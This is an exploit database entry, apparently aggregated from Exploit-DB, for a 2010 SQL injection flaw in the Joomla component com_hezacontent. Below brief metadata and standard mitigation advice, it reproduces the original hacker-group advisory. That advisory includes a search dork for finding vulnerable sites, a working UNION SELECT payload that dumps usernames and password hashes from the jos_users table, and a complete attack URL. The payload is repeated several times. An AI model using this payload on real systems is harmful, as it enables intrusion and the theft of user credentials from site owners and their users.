Joomla Component com_hezacontent SQL injection Vulnerability (id)

vendor:

Joomla

by:

kaMtiEz

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:joomlacode:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_hezacontent SQL injection Vulnerability (id)

A SQL injection vulnerability exists in Joomla Component com_hezacontent. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to unauthorized information or to manipulate data. The vulnerable parameter is 'id' which can be exploited with the following payload: -1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 9 march, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0 

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]

[ XpL ]

-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

[ d3m0 ]

http://site.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

dan lain sebagainya ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9 
[ NOTE ] 

[+] Rawk !
[+] gonzhack : buruan kesini dodolllllllllllllllllll !!

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f